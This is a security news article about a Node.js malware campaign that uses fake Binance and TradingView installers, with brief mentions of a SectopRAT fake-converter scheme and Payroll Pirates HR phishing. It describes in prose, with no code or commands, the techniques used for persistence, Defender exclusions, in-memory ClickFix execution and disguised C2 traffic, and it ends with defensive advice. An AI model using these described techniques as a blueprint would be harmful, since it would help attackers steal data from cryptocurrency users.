A Node.js malware campaign is actively targeting cryptocurrency users by using fake Binance and TradingView installers. Microsoft has reported that attackers leverage Node.js to deliver harmful payloads that can steal information and maintain access to infected systems.
How the Attack Unfolds
The attack starts with fake websites designed to look like legitimate cryptocurrency platforms. These sites trick users into downloading what appears to be real software. However, the downloaded installer contains a harmful dynamic-link library (DLL) called CustomActions.dll.
This DLL collects basic system data through Windows Management Instrumentation (WMI). At the same time, it creates a scheduled task to ensure the malware remains active even after a reboot. It opens the real Binance or TradingView website using msedge_proxy.exe to make the installer seem trustworthy.
Methods Used to Evade Detection
The malware runs PowerShell commands through the scheduled task. These commands:
- Download more malicious scripts from a remote server
- Set exclusions in Microsoft Defender to avoid being detected
- Use obfuscated code to gather more system details like BIOS info, installed apps, and hardware specifications
- The stolen data is converted into JSON format and sent to a command-and-control (C2) server via HTTPS.
Role of Node.js
As a part of Node.js Malware campaign, PowerShell command downloads a Node.js runtime and a compiled JavaScript file. Node.js executes this file, which begins collecting browser-related data and establishes network connections.
In some cases, the attackers use a method called “ClickFix”. This strategy downloads Node.js and executes JavaScript directly in memory using PowerShell, without saving a file. The JavaScript then performs network scanning and disguises the C2 communication as traffic from Cloudflare. It also modifies registry keys to maintain access to the system.
Microsoft stated that Node.js is a widely trusted development tool. However, attackers are now exploiting its flexibility to run malicious code under the guise of legitimate applications.
Related Campaigns and Threats
Another report from CloudSEK revealed a separate attack that used a fake PDF-to-DOCX converter website. This site closely resembled the real PDF Candy platform. It convinced users to run encoded PowerShell commands that installed the SectopRAT (also known as ArechClient2) information stealer.
Additionally, a hacking group known as Payroll Pirates has been running phishing campaigns that target employees with fake HR portals. These campaigns aim to steal login details and two-factor authentication codes. Once inside, the attackers change bank details to redirect salary payments to their own accounts.
Final Thoughts
The ongoing Node.js malware campaign highlights how trusted platforms can be exploited by attackers. Users, especially those in the cryptocurrency space, should be cautious when downloading software. Always verify the source before installing anything. Companies should also ensure that advanced threat protection tools are in place and up to date. This can significantly reduce the risk of falling victim to such sophisticated attacks.
Check out more interesting news:
